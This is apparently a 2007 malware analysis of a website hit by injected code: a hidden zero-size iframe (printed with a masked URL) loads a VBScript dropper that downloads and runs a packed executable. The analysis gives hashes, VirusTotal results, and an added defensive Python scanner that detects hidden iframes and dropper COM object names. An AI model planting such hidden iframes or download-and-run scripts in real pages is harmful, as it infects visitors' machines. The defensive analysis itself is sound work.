Original by endurer
2007-01-15, 2nd edition: added Kaspersky's response
2007-01-12, 1st edition
The following code was injected into the site's web pages:
/------
<iframe src=hxxp://i***.the*c***.cn/sin**ze*/sin**ze*.htm width=0 height=0></iframe>
------/
Kaspersky reports sin**ze*.htm as Trojan-Downloader.VBS.Psyme.ei.
Opening this page in a browser shows the message:
/------
Just won't let you see it! Eat your heart out, by ******!
------/
The string at ****** is probably the author's nickname; I've masked it here.
That's not all: the page then carries a VBScript that protects itself with Replace(). It uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download the file sinze.exe, saves it as %temp%/g0ld.com, and runs it through the ShellExecute method of the Shell.Application object.
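As an added example (not the page's own code), here is a small defender-side check in Python: it flags iframes with width or height 0 and scans inline script for the COM object names listed above, first undoing literal Replace() string-splitting of the kind the dropper used to hide those names. The HTML and VBScript sample inside is constructed for the demo; the domain is a placeholder and the Replace() patterns are assumed, not taken from the real page.

```python
import re
from html.parser import HTMLParser

# COM object / method names the VBScript dropper on this page used.
INDICATORS = ("Microsoft.XMLHTTP", "Scripting.FileSystemObject", "Shell.Application", "ShellExecute")
# A literal VBScript call of the form Replace("text", "find", "with").
_REPLACE = re.compile(r'Replace\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)', re.I)

class _PageScanner(HTMLParser):
    """Collects src of zero-size iframes and the text of inline <script> blocks."""
    def __init__(self):
        super().__init__()
        self.hidden_iframes, self.script_text, self._in_script = [], "", False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # unquoted values such as width=0 are parsed fine
        if tag == "iframe" and (a.get("width") == "0" or a.get("height") == "0"):
            self.hidden_iframes.append(a.get("src", ""))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.script_text += data

def deobfuscate_replace(script):
    """Evaluate literal Replace() calls, innermost first, so split names reassemble."""
    join = lambda m: '"' + m.group(1).replace(m.group(2), m.group(3)) + '"'
    prev = None
    while prev != script:  # repeat until no literal Replace() is left (handles nesting)
        prev, script = script, _REPLACE.sub(join, script)
    return script

def scan_html(html):
    """Return hidden iframe sources and dropper indicators found in inline scripts."""
    p = _PageScanner()
    p.feed(html)
    clean = deobfuscate_replace(p.script_text).lower()
    return {"hidden_iframes": p.hidden_iframes,
            "indicators": [i for i in INDICATORS if i.lower() in clean]}

# Constructed sample, not the real page: placeholder domain and toy Replace() splitting.
SAMPLE = """<iframe src=http://example.invalid/sinze.htm width=0 height=0></iframe>
<script language="VBScript">
Set h = CreateObject(Replace("Micro#soft.XML#HTTP", "#", ""))
Set f = CreateObject(Replace(Replace("Scrip@ting.File@System@Object", "@", ""), "!", ""))
</script>"""
```

Running scan_html(SAMPLE) reports the hidden iframe source and the two reassembled object names; a page with only normally sized iframes and no script yields empty lists.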
sinze.exe is packed with ASPack
文件说明符 : D:/test/sinze.exe
获取文件版本信息大小失败!
创建时间 : 2007-1-12 16:21:11
修改时间 : 2007-1-12 16:21:13
访问时间 : 2007-1-12 16:28:57
大小 : 88708 字节 86.644 KB
MD5 : 118e7d74d99e10cef293b254e1dc78ff
Complete scanning result of "__25968", received in VirusTotal at 01.12.2007, 10:20:11 (CET).
Antivirus | Version | Update | Result |
AntiVir | 7.3.0.21 | 01.09.2007 | HEUR/Crypted |
Authentium | 4.93.8 | 01.12.2007 | could be a corrupted executable file |
Avast | 4.7.892.0 | 12.30.2006 | no virus found |
AVG | 386 | 01.11.2007 | no virus found |
BitDefender | 7.2 | 01.12.2007 | no virus found |
CAT-QuickHeal | 9.00 | 01.12.2007 | no virus found |
ClamAV | devel-20060426 | 01.12.2007 | no virus found |
DrWeb | 4.33 | 01.12.2007 | no virus found |
eSafe | 7.0.14.0 | 01.10.2007 | Suspicious Trojan/Worm |
eTrust-InoculateIT | 23.73.112 | 01.12.2007 | no virus found |
eTrust-Vet | 30.3.3319 | 01.11.2007 | no virus found |
Ewido | 4.0 | 01.11.2007 | no virus found |
Fortinet | 2.82.0.0 | 01.12.2007 | suspicious |
F-Prot | 3.16f | 01.11.2007 | no virus found |
F-Prot4 | 4.2.1.29 | 01.12.2007 | no virus found |
Ikarus | T3.1.0.27 | 01.09.2007 | no virus found |
Kaspersky | 4.0.2.24 | 01.12.2007 | no virus found |
McAfee | 4937 | 01.11.2007 | no virus found |
Microsoft | 1.1904 | 01.12.2007 | no virus found |
NOD32v2 | 1972 | 01.11.2007 | no virus found |
Norman | 5.80.02 | 01.11.2007 | no virus found |
Panda | 9.0.0.4 | 01.12.2007 | no virus found |
Prevx1 | V2 | 01.12.2007 | no virus found |
Sophos | 4.13.0 | 01.11.2007 | no virus found |
Sunbelt | 2.2.907.0 | 01.12.2007 | VIPRE.Suspicious |
TheHacker | 6.0.3.147 | 01.11.2007 | no virus found |
UNA | 1.83 | 01.11.2007 | no virus found |
VBA32 | 3.11.2 | 01.10.2007 | no virus found |
VirusBuster | 4.3.19:9 | 01.11.2007 | no virus found |
Additional Information
File size: 88708 bytes
MD5: 118e7d74d99e10cef293b254e1dc78ff
SHA1: 7e562cfafef92b5f17d279beb2c968bd9e612817
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
Today I downloaded this file again:
文件说明符 : D:/test/sinze.exe
获取文件版本信息大小失败!
创建时间 : 2007-1-15 16:11:33
修改时间 : 2007-1-15 16:13:51
访问时间 : 2007-1-15 16:14:42
大小 : 425569 字节 415.609 KB
MD5 : 03111c59838bf6e6a16ad64413ed3954
During the download it was intercepted once by KAV6, so only 414,453 bytes were obtained.
Kaspersky reports it as: Virus.Win32.Delf.an